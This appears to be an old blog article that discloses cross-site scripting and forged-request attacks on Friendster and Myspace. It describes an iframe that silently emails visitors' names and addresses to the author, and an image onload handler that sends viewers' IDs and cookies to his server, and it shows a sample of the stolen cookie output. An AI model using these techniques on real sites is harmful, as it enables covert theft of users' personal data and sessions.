How To Hacking Friendster Part 1

Hacking Friendster, Part I

EDITOR'S NOTE: I have posted these hacks in the hopes of publicizing security holes and forcing the networks to close them. Please do not send me email, myspace messages, or friendster messages asking me to spend my free time helping you duplicate this hack. Both Myspace and Friendster have modified their sites enough so that these hacks no longer work. In addition, this article contained far more than enough information to duplicate these hacks (when they worked), and still contains enough information to build similar hacks today. If you do not understand how to make similar hacks, consider doing your own research. If you want my help learning CGI and DHTML/JavaScript, I am available as an independent contractor and instructor at the rate of $60/hr. If you contact me asking for assistance in stealing other people's personal information I will forward your email to the relevant social network's abuse contact person, and recommend that they deactivate your account.

This is the first in a series of articles that expose security flaws in social networks. The two hacks described here are cross-site scripting attacks.

My Friendster profile has a link to my homepage. And my homepage has an embedded iframe in it, which uses a get string to call the "Forward this profile to another user" function of friendster.

In other words, by loading my webpage, your browser loads a page which sends an email to me, via the Friendster service. This email contains: your first & last name, the email you used to sign up to Friendster, your Friendster user-id, and a link which I can use to sign up to Friendster and automatically become your friend. There is no record of this anywhere on your Friendster account; it is totally invisible.

Here's the code in my homepage:

Here's a sample of what gets sent in email:

Matt Chisholm has forwarded a user's profile to you from Matt's
personal network on Friendster.

Matt is 27 in San Francisco, CA.

If you are a Friendster member, you can view Matt's profile by
clicking below:
http://www.friendster.com/user.jsp?id=229243

If you are not a Friendster member yet, you can join Friendster by
clicking below:
http://www.friendster.com/join.jsp?inviteuser=229243

Friendster is an online community that connects people through networks
of friends for dating or making new friends.

Once you join Friendster, you will be automatically connected to your
friend Matt, and all of Matt's friends.

Friendster is inadvertently impervious to this attack, however, since you are often logged out within moments of logging in, and when you do successfully stay logged in, the site is either too slow or by that point my profile is no longer in your "Personal Network."

The security holes on Myspace, while they have gotten better, are much deeper. For a long time, they allowed free HTML entry in all fields, and they still allow some HTML entry.

For a long time, you could embed an image in your Myspace profile which called another Myspace function, so you effectively could cause a user viewing your profile (or anything with text that you created) to execute any Myspace function with your own parameters.

In these heady days of Myspace hackability, Jonathan & I created some interesting myspace hacks, which he will describe in a later post.

At some point, someone at Myspace wised up, and stopped allowing http GET requests, and then they blacklisted the and tags, added javascript to their pages to prevent them being loaded in frames, and at at least one point, someone removed a hack from my profile. (Plus for some reason they don't allow # characters in text.)

Myspace hasn't completely closed off their security holes, however. The numerous javascript event handlers are still allowed, and so are image tags, so you can embed a 1x1 image, and execute arbitrary javascript on image load.

My javascript of choice attempts to log who is viewing my profile, by sending the content of the launchIC function, which contains the viewer's UID, and all of their browser cookies, to php on my site which mails it to me.

The email I get looks like this (you can see my userid down there being assigned to memberID, and the cookie content varies greatly depending on what the user has been doing):

myspace view from
IMREQUESTCHECK={ts '2004-02-05 00:43:03'}
MYUSERINFO=M)NOMP_;R2P6%P]>35)6OF/N$5%:C4MIYK,N7@Y'!2\N
6R ??S\/&1/[**0K:R_DIS10DSZOKX@ !
function launchIC(destinationMemberID) {